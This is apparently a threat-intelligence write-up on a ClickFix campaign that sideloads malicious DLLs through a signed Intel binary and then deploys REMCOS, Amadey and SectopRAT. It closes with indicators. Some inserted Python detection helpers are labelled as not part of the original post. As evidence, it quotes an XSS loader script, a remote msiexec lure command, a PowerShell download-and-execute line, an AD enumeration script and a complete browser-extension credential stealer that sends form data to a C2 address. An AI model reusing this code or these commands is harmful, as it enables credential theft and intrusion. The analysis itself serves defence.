Intel Reconfig Manager Exploited via DLL Sideloading
ClickFix Attack Chain
This incident began with ClickFix (Like they all do these days).
The domain mnnursinghomelaw[.]com was compromised and serving a standard ClickFix lure.
The injected code abused the JSONP callback parameter of the accounts.google.com OAuth revoke endpoint (a reflected XSS) to load the ClickFix page.
<script id="A9TNB8" src="https://accounts.google.com/o/oauth2/revoke?callback=Function(atob(%27...%27))"></script>
The error response from accounts.google.com/o/oauth2/revoke echoes the callback name as the first item of the JSONP body, so the <script> tag parses and executes it.
// API callback
Function(atob('CiA...Owo'))({
"error": {
"code": 400,
"message": "Invalid JSONP callback name: 'Function(atob('CiA...Owo'))'; only alphabet, number, '_', '$', '.', '[' and ']' are allowed.",
"status": "INVALID_ARGUMENT"
}
});
This script decodes to an event listener that looks for a mousemove event. When detected, it decodes a URL and pulls the ClickFix lure.
let bAbort = false;
document.addEventListener('mousemove', (e) => {
if(bAbort) return;
(function (d, w, o, u, n, s) { //console.log('gsv', gsv); console.log('verm', verm);
//console.log('gsv = ', gsv);
if (!sessionStorage["gs_lo"] || sessionStorage["__sync_load"] === "once") return;
const style = d.createElement("style");
style.textContent = "@keyframes fadeIn{from{opacity:0}to{opacity:1}}body{opacity:0;animation:1s ease-in-out 1s forwards fadeIn}";
d.head.appendChild(style);
var data = { host: d.location.host, now: Date.now() };
s = d.createElement(o);
s.async = 1; s.src = u + "?data=" + encodeURIComponent(JSON.stringify(data));
document.documentElement.appendChild(s);
})(document, window, "script", atob("aHR0cHM6Ly9saXN0Lm1ldGFtZXRyaWNzLm5ldC8") + atob("Z2VvdGR2Mmluc3RhbnQucGhw"));
let elS = document.getElementById("A14SOI6");
elS && (elS.remove());
}, { once: true });
I won’t include the lure code, because it isn’t super interesting. A standard lure. It copies an MSI installation command to the user’s clipboard.
MSiExec.exE -PaCkAGe http:\\cfmn.us.com/compile/..\debug/..\UserID48763298 /q
This MSI unpacks the intel-reconfig.exe binary and DLLs and executes them.
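The lure command above hides a plain remote MSI fetch behind mixed case, backslashes and `..` segments. The following added example (not from the original post) normalises an msiexec command line so a detection rule sees the real package URL; the command string is a constructed copy of the one on the page, and the flag handling assumes the common `/i`, `-package` and `/q*` spellings.

```python
import posixpath
import re

# Constructed copy of the command from the lure (raw string, so backslashes survive).
CLICKFIX_CMD = r"MSiExec.exE -PaCkAGe http:\\cfmn.us.com/compile/..\debug/..\UserID48763298 /q"

URL_RE = re.compile(r"^(https?):/+([^/]+)(/.*)?$", re.IGNORECASE)

def canonical_url(pkg):
    """Fold case, turn backslashes into slashes and resolve '..' segments.
    Returns None when the package argument is not an http(s) URL."""
    m = URL_RE.match(pkg.replace("\\", "/"))
    if not m:
        return None
    scheme, host, path = m.group(1).lower(), m.group(2).lower(), m.group(3) or "/"
    return f"{scheme}://{host}{posixpath.normpath(path)}"

def normalize_msiexec(cmdline):
    """Parse an msiexec command line (whitespace-split; quoted paths with
    spaces are not handled) into the fields a detection rule cares about."""
    tokens = cmdline.split()
    if not tokens or tokens[0].lower() not in ("msiexec", "msiexec.exe"):
        return None
    info = {"raw_package": None, "remote_package": None, "quiet": False}
    i = 1
    while i < len(tokens):
        t = tokens[i].lower()
        if t[0] in "/-" and t[1:2] == "q":            # /q, /qn, /quiet, -q ...
            info["quiet"] = True
        elif t in ("/package", "-package", "/i", "-i") and i + 1 < len(tokens):
            i += 1
            info["raw_package"] = tokens[i]
        elif t[0] not in "/-" and info["raw_package"] is None:
            info["raw_package"] = tokens[i]            # bare package path
        i += 1
    if info["raw_package"]:
        info["remote_package"] = canonical_url(info["raw_package"])
    return info

def is_suspicious(cmdline):
    """Flag a silent install whose package is fetched over HTTP(S)."""
    info = normalize_msiexec(cmdline)
    return bool(info and info["quiet"] and info["remote_package"])

if __name__ == "__main__":
    print(normalize_msiexec(CLICKFIX_CMD))
```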
DLL Hijacking and Side-Loading
DLL Loading Chain
- intel-reconfig.exe loads legitimate signed DLLs that import xerces-c_3_2.dll
- xerces-c_3_2.dll calls get_device() from fltSca.dll
- fltSca.dll calls Trainblock() and activity() from sichbopvr.dll
- sichbopvr.dll loads and executes a RAT (likely REMCOS - LevelBlue): Trainblock() allocates the payload, activity() executes it
- fltSca.dll loads Boot.dll; Boot.dll contains additional C2 and enumeration capabilities
Summary
The intel-reconfig.exe binary is a legitimate, signed binary from Intel. It is bundled with several Intel-signed DLLs as well. One of these DLLs, ccl_msg.dll, loads an Apache DLL used for XML processing. This DLL, xerces-c_3_2.dll, is the one the threat actor targeted for abuse via DLL hijacking.
xerces-c_3_2.dll contains all of the original content of the legitimate Apache DLL, but it additionally contains a tacked-on segment calling fltSca.dll. This segment has been appended to the end of the file content.
Because of this inclusion method, the appended import is not reflected in the IAT of xerces-c_3_2.dll, so IDA does not display it correctly.
However, the import is still visible in a hex editor (like HxD), or through tools like PEStudio.
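Because the extra call to fltSca.dll lives in data appended after the last section, a quick triage check is to compute where the mapped sections end and look for DLL names in whatever follows. The added example below (not code from the post) does that with a minimal PE section-table parser; the sample PE is constructed inline and is not the real xerces-c_3_2.dll, and only ASCII DLL names in the overlay are reported.

```python
import re
import struct

DLL_NAME_RE = re.compile(rb"[\x20-\x7e]{1,64}\.dll", re.IGNORECASE)

def parse_sections(data):
    """Return (name, PointerToRawData, SizeOfRawData) for each section header."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    nsections = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    table = coff + 20 + opt_size                      # section table follows the optional header
    sections = []
    for i in range(nsections):
        hdr = table + i * 40
        name = data[hdr:hdr + 8].rstrip(b"\0").decode("ascii", "replace")
        raw_size, raw_ptr = struct.unpack_from("<II", data, hdr + 16)
        sections.append((name, raw_ptr, raw_size))
    return sections

def overlay_offset(data):
    """First byte after the last section's raw data; anything beyond is overlay."""
    return max((ptr + size for _, ptr, size in parse_sections(data)), default=0)

def find_appended_dll_refs(data):
    """Return (overlay_length, DLL names found in the overlay). The import
    directory lives inside a section, so a DLL name that only exists past
    overlay_offset was appended after linking and will not show in the IAT."""
    start = overlay_offset(data)
    overlay = data[start:]
    names = [m.group(0).decode("ascii") for m in DLL_NAME_RE.finditer(overlay)]
    return len(overlay), names

def build_sample_pe(overlay=b""):
    """Constructed minimal 64-bit PE with one .text section (not a real binary)."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)             # e_lfanew: NT headers right after DOS header
    coff = struct.pack("<HHIIIHH", 0x8664, 1, 0, 0, 0, 0, 0x22)   # 1 section, no optional header
    text = b".text".ljust(8, b"\0") + struct.pack(
        "<IIIIIIHHI", 0x200, 0x1000, 0x200, 0x200, 0, 0, 0, 0, 0x60000020)
    headers = (bytes(dos) + b"PE\0\0" + coff + text).ljust(0x200, b"\0")
    return headers + b"\xc3" * 0x200 + overlay        # section body, then overlay

if __name__ == "__main__":
    sample = build_sample_pe(b"\x00fltSca.dll\x00get_device\x00")
    print(find_appended_dll_refs(sample))             # (23, ['fltSca.dll'])
```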
The get_device function in fltSca.dll loads Boot.dll and Voice.dat.
get_device finds Boot.dll and loads it via a call to LoadLibraryW.
The LoadLibraryW call can be seen in APIMonitor.
Voice.dat is also loaded in the same function.
After loading Boot.dll and processing Voice.dat, fltSca.dll calls Trainblock and activity from sichbopvr.dll. This is consistent with the activity observed by LevelBlue in their recent post on REMCOS RAT, specifically the use of VirtualProtect and EnumSystemCodePagesW for shellcode execution. In the incident observed by LevelBlue, the general loading process is exactly the same as the loader observed in fltSca.dll and sichbopvr.dll.
- Voice.dat load in fltSca.dll
- fltSca.dll calls Trainblock()
- sichbopvr.dll allocating the shellcode in Trainblock and executing it in activity
This activity can be confirmed in APIMonitor as well.
Interestingly, Voice.dat is a GARBro DB file, a zlib-compressed format. Drop the header, inflate it, and use an MS-NRBF parser to deserialize it. I used nrbf-parser.
The shellcode was simply inserted into the file at offset 1153021 (the offset that decompression fails at).
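Locating the spliced-in payload comes down to finding the byte at which the zlib stream stops inflating. The added example below (not the author's tooling) feeds the stream to zlib incrementally and pins that offset; the header length is a parameter because the GARBro header size is not given on the page, and the sample blob is a constructed stand-in for Voice.dat with junk bytes inserted mid-stream.

```python
import zlib

def _inflate_until_error(blob, start, step):
    """Feed blob[start:] to zlib in `step`-byte pieces. Returns (output,
    offset of the piece zlib rejected, or None if no error was raised)."""
    d = zlib.decompressobj()
    out = bytearray()
    pos = start
    while pos < len(blob) and not d.eof:
        piece = blob[pos:pos + step]
        try:
            out += d.decompress(piece)
        except zlib.error:
            return out, pos
        pos += len(piece)
    return out, None

def find_corruption_offset(blob, header_len=0, chunk=4096):
    """Inflate the zlib stream that follows a header_len-byte header and return
    (decompressed data, file offset at which zlib first rejected the stream).
    The offset is None when the stream inflates cleanly. A coarse pass finds
    the failing chunk; a byte-wise pass over that region pins the exact byte."""
    out, fail = _inflate_until_error(blob, header_len, chunk)
    if fail is None:
        return bytes(out), None
    out, fail = _inflate_until_error(blob[:fail + chunk], header_len, 1)
    return bytes(out), fail

def build_sample(inject=b""):
    """Constructed stand-in for Voice.dat: 4-byte header + zlib stream, with
    `inject` spliced into the middle of the compressed data. Returns the blob
    and the offset at which the injection starts."""
    stream = zlib.compress(bytes(range(256)) * 64)
    k = len(stream) // 2
    return b"GARB" + stream[:k] + inject + stream[k:], 4 + k

if __name__ == "__main__":
    blob, where = build_sample(b"\x90" * 2048)
    data, fail = find_corruption_offset(blob, header_len=4)
    print(f"junk inserted at {where}, zlib rejected the stream at {fail}")
```

zlib may only notice the damage a few bytes past the insertion point, so treat the reported offset as an upper bound and look back from it.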
Boot.dll Capabilities
Broken down into explicit functions, Boot.dll contains the ability to:
- Enumerate RDP sessions via WTSEnumerateSessionsW
- Take screenshots via BitBlt
- Communicate over the network (including beaconing)
- Enumerate windows with GetDesktopWindow and GetTopWindow
- (Likely) reflectively load code: memcpy to move the data, VirtualProtect to make it executable, CreateThread for execution
Incident
For the actual compromise chain, I will include information from two observed incidents. The first incident was on an enterprise device. The second was in a controlled sandbox environment.
Incident A [Enterprise - Domain Joined]
Timeline
07:54 User Visits Compromised Domain
`www[.]mnnursinghomelaw[.]com` - Compromised Domain
`list[.]metametrics[.]com` - ClickFix loader
07:55 User Executed ClickFix Command
`MSiExec.exE -PaCkAGe hxxp[:\\]cfmn[.]us[.]com/compile/..\debug/..\UserID48763298 /q`
07:58 User Device Connects to C2
`193.202.84.17`
08:00 A Run key is created
`HKU\Software\Microsoft\Windows\CurrentVersion\Run Intel Reconfig Manager <..>\AppData\Local\Programs\Intel Reconfig Manager\intel-reconfig.exe`
08:00 A Staging Directory is Created
`<..>\AppData\Local\UiInterface`
08:12 A Scheduled Task is Created
`Intel Reconfig Manager <..>\AppData\Local\Programs\Intel Reconfig Manager\intel-reconfig.exe`
09:56 Device Domain Queried
`dsregcmd /status | findstr "DomainJoined WorkplaceTenantName Executing"`
10:10 Active Directory Enumeration
11:56 Binary File Written to Staging Directory
`<..>\AppData\Local\UiInterface\minterface.bin`
During this incident, two commands were observed executed on the compromised device. The first command was used to return the domain status of the device. Once confirming the device was domain joined, the threat actor ran a PowerShell script to enumerate the servers joined to the domain.
Notably, this script was first observed in use by Iranian Actors in 2024.
$i=0
$D=[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$L='LDAP://'.$D
$D = [ADSI]$L
$Date = $((Get-Date).AddDays(-90).ToFileTime())
$str = '(&(objectcategory=computer)(operatingSystem=*serv*)(|(lastlogon>='+$Date+')(lastlogontimestamp>='+$Date+')))'
$s = [adsisearcher]$str
$s.searchRoot = $L.$D.distinguishedName
$s.PropertiesToLoad.Add('cn') > $Null
$s.PropertiesToLoad.Add('operatingsystem') > $Null
$s.PropertiesToLoad.Add('description') > $Null
$s.PropertiesToLoad.Add('distinguishedName') > $Null
Foreach ($CA in $s.FindAll()){
Write-Host $CA.Properties.Item('cn')
$CA.Properties.Item('operatingsystem')
$CA.Properties.Item('description')
$CA.Properties.Item('distinguishedName')
$i++
}
Write-host Total servers: $i
The device was contained shortly after, and further behavior was not observed.
Incident B [Sandbox]
Timeline
13:48 intel-reconfig.exe executed
13:48 Boot.dll loaded
`fltSca.dll LoadLibraryW ( "C:\Users\Admin\Desktop\IRM\Intel Reconfig Manager\Boot.dll" )`
13:50 Google DoH Query
13:50 C2 Connection
`193.202.84.17`
13:50 intel-reconfig.exe Terminated
`Initial Analysis to capture base indicators`
...
15:29 intel-reconfig.exe executed
15:29 Boot.dll Loaded
`fltSca.dll LoadLibraryW ( "C:\Users\Admin\Desktop\IRM\Intel Reconfig Manager\Boot.dll" )`
15:30 Google DoH Query
`webio.dll RtlCompareUnicodeStrings ( "dns.google", 10, "dns.google/dns-query", 10, TRUE )`
15:30 C2 Connection
`193.202.84.17`
15:32 Registry Run Key Set
`TargetObject: HKU\..\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Intel Reconfig Manager C:\Users\Admin\Desktop\IRM\Intel Reconfig Manager\intel-reconfig.exe`
15:44 Task Created
`TargetFilename: C:\Windows\System32\Tasks\Intel Reconfig Manager`
16:22 PowerShell Spawned from intel-reconfig.exe
`CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoLogo -NoProfile -NoExit -Command "$OutputEncoding=[Console]::OutputEncoding=[Console]::InputEncoding=[System.Text.UTF8Encoding]::UTF8"`
16:26 PowerShell Script Execution
`Invoke-WebRequest -Uri 'hxxp[:\\]cfmn[.]us[.]com/Data.zip' -OutFile 'C:\programdata\bootstrap.zip'; Expand-Archive -Path 'C:\programdata\bootstrap.zip' -DestinationPath 'c:\programdata\InfoAggregator' -Force; Remove-Item 'c:\programdata\bootstrap.zip'; cmd /c 'c:\programdata\InfoAggregator\InfoAggregator.exe';`
16:27 InfoAggregator.exe Executed
`c:\programdata\InfoAggregator\InfoAggregator.exe`
16:27 InfoAggregator.exe Files Moved
`TargetFilename: C:\ProgramData\com_int_thread_v7_dbg\InfoAggregator.exe`
16:27 InfoAggregator.exe Executed
`CommandLine: C:\ProgramData\com_int_thread_v7_dbg\InfoAggregator.exe`
16:27 XPFix.exe Dropped
`TargetFilename: C:\Users\Admin\AppData\Roaming\com_int_thread_v7_dbg\XPFix.exe`
16:28 XPFix.exe Executed
`CommandLine: "C:\Users\Admin\AppData\Roaming\com_int_thread_v7_dbg\XPFix.exe" "C:\Users\Admin\AppData\Roaming\com_int_thread_v7_dbg\XPFix.exe" /u`
16:28 Fake Google Doc Extension Dropped
`C:\Users\Admin\AppData\Local\nimdA\llg`
16:28 XDock86.exe Dropped
`Image: C:\ProgramData\com_int_thread_v7_dbg\InfoAggregator.exe TargetFilename: C:\Users\Admin\AppData\Local\XDock86.exe`
16:28 XDock86.exe Execution
`CommandLine: C:\Users\Admin\AppData\Local\XDock86.exe`
16:28 XDock86.exe Network Connection
`150.241.81.137`
16:28 XDock86 Browser Hijacking
`SourceImage: C:\Users\Admin\AppData\Local\XDock86.exe TargetImage: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe`
16:28 Hijacked Edge Process
`ParentCommandLine: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-sandbox --allow-no-sandbox-job --disable-gpu --mute-audio --disable-audio --user-data-dir="C:\Users\Admin\AppData\Local\Temp\r1iramwh.3ee"`
This incident is the result of manual analysis in a controlled sandbox environment. Execution was primarily monitored through APIMonitor, Sysmon, and Wireshark. The intel-reconfig.exe binary was executed once for initial indicator gathering and testing, and once for long-term monitoring of threat actor activities.
While not confirmed, it is likely that the sample uses Google DoH to retrieve the IPv4 address of the C2 server. A quick test shows that carrotbunnies.com resolves to 193[.]202[.]84[.]17, the first C2 address.
After contacting the C2, a Run key and Scheduled Task were created.
The task contents are:
<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
<RegistrationInfo>
<Author>Admin</Author>
<URI>\Intel Reconfig Manager</URI>
<SecurityDescriptor>D:(A;;FA;;;WD)</SecurityDescriptor>
</RegistrationInfo>
<Triggers>
<LogonTrigger id="10789407">
<Enabled>true</Enabled>
<UserId>DESKTOP-R30J1LQ\Admin</UserId>
<Delay>PT03S</Delay>
</LogonTrigger>
</Triggers>
<Principals>
<Principal id="10795294">
<RunLevel>LeastPrivilege</RunLevel>
<UserId>DESKTOP-R30J1LQ\Admin</UserId>
<LogonType>InteractiveToken</LogonType>
</Principal>
</Principals>
<Settings>
<MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
<DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
<StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>
<AllowHardTerminate>true</AllowHardTerminate>
<StartWhenAvailable>true</StartWhenAvailable>
<RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
<IdleSettings>
<Duration>PT10M</Duration>
<WaitTimeout>PT1H</WaitTimeout>
<StopOnIdleEnd>true</StopOnIdleEnd>
<RestartOnIdle>false</RestartOnIdle>
</IdleSettings>
<AllowStartOnDemand>true</AllowStartOnDemand>
<Enabled>true</Enabled>
<Hidden>false</Hidden>
<RunOnlyIfIdle>false</RunOnlyIfIdle>
<WakeToRun>false</WakeToRun>
<ExecutionTimeLimit>PT0S</ExecutionTimeLimit>
<Priority>7</Priority>
</Settings>
<Actions Context="10795294">
<Exec>
<Command>C:\Users\Admin\Desktop\IRM\Intel Reconfig Manager\intel-reconfig.exe</Command>
</Exec>
</Actions>
</Task>
Approximately an hour after execution, the threat actor began staging files on the device. This behavior started with PowerShell execution that pulled bootstrap.zip from the actor-controlled domain, cfmn[.]us[.]com.
Invoke-WebRequest -Uri 'hxxp[:\\]cfmn[.]us[.]com/Data.zip' -OutFile 'C:\programdata\bootstrap.zip'; Expand-Archive -Path 'C:\programdata\bootstrap.zip' -DestinationPath 'c:\programdata\InfoAggregator' -Force; Remove-Item 'c:\programdata\bootstrap.zip'; cmd /c 'c:\programdata\InfoAggregator\InfoAggregator.exe';
The InfoAggregator.exe payload retrieved from this archive is an Amadey payload that is well documented.
After the Amadey payload was executed, XPFix.exe was dropped and executed. This payload is from the 360 Security Guard (360安全卫士) tool from 360.cn. 360 Security Guard offers multiple products, including Endpoint Security tools.
This tool may have been used in an attempt to remove or disable other security tools installed on the system. The process was terminated immediately after starting and did not appear to have any network communications, dropped artifacts, or other indications of malicious use.
The Amadey payload was also used to drop XDock86.exe.
XDock86.exe is a Paragon Software system utility originally named rmb_pnpenforce. Paragon Software creates forensics, data management, backup, and other tools.
The XDock86.exe payload was used to deploy a malicious Microsoft Edge profile for browser hijacking. Additionally, it made a significant number of requests to 150[.]241[.]81[.]137 over ports 443 and 9000.
These requests closely match indicators associated with SectopRAT (Trend Micro).
GET /wbinjget?q=A1EB3078895AFDB699B5D38AA576E57E HTTP/1.1
Host: 150.241.81.137:9000
Connection: Keep-Alive
HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 0
Server: Microsoft-HTTPAPI/2.0
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
Access-Control-Allow-Headers: *
Access-Control-Expose-Headers:
Accept: */*
Accept-Language: en-US, en
Accept-Charset: ISO-8859-1, utf-8
Host: *:9000
Date: Wed, 08 Apr 2026 23:08:53 GMT
Connection: close
Additionally, Edge browser hijacking via a malicious browser profile is behavior documented in many SectopRAT (AKA ArechClient2) incidents.
A fake Google Docs extension was also written and utilized for browser credential theft.
{
"manifest_version": 3,
"name": "Google Docs",
"description": "Edit, create, and view your documents, spreadsheets, and presentations — all without internet access.",
"version": "1.7.38",
"icons": {
"16": "icon.png",
"48": "icon.png",
"128": "icon.png"
},
"permissions": [
"activeTab",
"storage",
"scripting"
],
"host_permissions": [
"<all_urls>"
],
"content_scripts": [
{
"all_frames": true,
"js": ["jquery.js", "content.js"],
"matches": ["<all_urls>"]
}
],
"background": {
"service_worker": "background.js"
},
"action": {
"default_title": "SFASFASD"
}
}
content.js is a
var server = "http://150.241.81.137:9000/";
var iddd = 'A1EB3078895AFDB699B5D38AA576E57E';
var debug = 1;
var currLoc = "";
(async function () {
var clientId = iddd;
urlChangeAllert();
spyjs_refreshEvents(clientId);
})()
function urlChangeAllert(){
try{
var loc = window.location;
getNoRet(server+'churl?pcid='+iddd+"&url="+loc);
}catch(error){ }
}
function spyjs_refreshEvents(clid){
if(currLoc != location.href){
currLoc=location.href;
spyjs_saveData("("+currLoc+")");
}
$('input').unbind('change');
$('input').change(function(e) {
spyjs_getInput(e.currentTarget, clid);
});
$('select').unbind('change');
$('select').change(function(e) {
spyjs_getInput(e.currentTarget, clid);
});
$('checkbox').unbind('change');
$('checkbox').change(function(e) {
spyjs_getInput(e.currentTarget, clid);
});
$('button').unbind('change');
$('button').change(function(e) {
spyjs_getInput(e.currentTarget, clid);
});
$('textarea').unbind('change');
$('textarea').change(function(e) {
spyjs_getInput(e.currentTarget, clid);
});
}
function spyjs_getInput(inputInfo, clid){
var name = inputInfo.name;
var value = inputInfo.value;
var stolenInput = {};
if(name === ""){
name="undefined_input";
}
if(value != ""){
stolenInput[name] = value;
var base = currLoc;
getNoRet(server+'fsave?name='+name+"&value="+value + "&sites=" +base + "&clid=" + clid);
}
}
function spyjs_saveData(data){
};
function get(urll){
var ret;
return new Promise(async send => {
chrome.runtime.sendMessage({message: "get", url: urll}, (response) => {
//onsole.log(response);
send(response);
});
});
}
function getNoRet(urll){
new Promise(async send => {
chrome.runtime.sendMessage({message: "get", url: urll}, (response) => {
send(response);
//console.log(response);
});
});
}
Unfortunately, I didn’t get a good capture of the XDock86.exe execution. It appears that the Amadey payload is creating it in a suspended state, possibly for injection or hollowing.
XDock86.exe is directly using NtDeviceIoControlFile to interact with \Device\Afd. This is what Winsock is built on. We can confirm the connection by looking at IOCTL_AFD_SET_CONTEXT, IOCTL_AFD_BIND, and IOCTL_AFD_CONNECT.
If we examine the IOCTL_AFD_BIND call, we can extract the IP address from the input buffer.
Notes
I did leave the payloads running on my sandbox for a couple of days after the initial analysis. Nothing happened past the Edge profile launch.
Additionally, there were a lot of payloads and processes to this incident. I tried to at least cover everything, but I didn’t go in-depth on the initial (likely) REMCOS RAT or the Amadey loader. Some of the DLLs could also benefit from further analysis.
Indicators
| Indicator | Type | Description |
|---|---|---|
| mnnursinghomelaw[.]com | Domain | Compromised domain |
| list[.]metametrics[.]com | Domain | ClickFix lure |
| cfmn[.]us[.]com | Domain | Payload delivery |
| 193[.]202[.]84[.]17 | IPv4 | C2 |
| 150[.]241[.]81[.]137 | IPv4 | C2 |
| 97ACEF1702383364DE256D69F9672AC7A1E2A450BFB3819649A18246B4ECD679 | SHA256 | UserID48763298.msi - ClickFix payload |
| 16E2580E18E60037C7B139FF29085841C3110EFEC44A9F948450E8A0AC65DEB7 | SHA256 | intel-reconfig.exe - Legitimate Intel binary |
| CFDAB2693D867FBC5FB2B072BC972520CD76D20827002A9BEFD6DCC170504582 | SHA256 | xerces-c_3_2.dll - Hijacked DLL |
| BA21A8B70069292DA39F294B9B60AC90FF6179325F9015C99C2779BBD27B4EF5 | SHA256 | fltSca.dll - Orchestrator |
| 9AA1DAF56FFFF27888BD49742FFDDDF35003F3146F12A2FE22F57C86E60A792E | SHA256 | sichbopvr.dll - RAT Loader |
| E59404B9A360EDDA7EC13F291FF569135BA1B422AA8C9C6FDD5C3AD4991DB39C | SHA256 | Boot.dll - Backdoor |
| EC4C0A87EC82E97E0D6D32E6C5E78B472BF203861FFF5052E4B1AE2ED14B48DE | SHA256 | InfoAggregator.exe - Amadey |
| 5EC174AF8A18A5516B8A6E11D8A27481D70DF14D1EDB67C48B5458FF44DF9146 | SHA256 | XPFix.exe - Qihoo 360 Security Guard Protection Center Module |
| EE986C1CEF147252D59D2E5BAC4FAA902B121B54CBD576C8CFAF0DEE58B1F6BE | SHA256 | XDock86.exe - Paragon Software Utility |
| FFCECC52E4739BE7867C5FED4C4C594041896C205992E1A99A375E87F8D1CC30 | SHA256 | content.js - Browser credential harvester |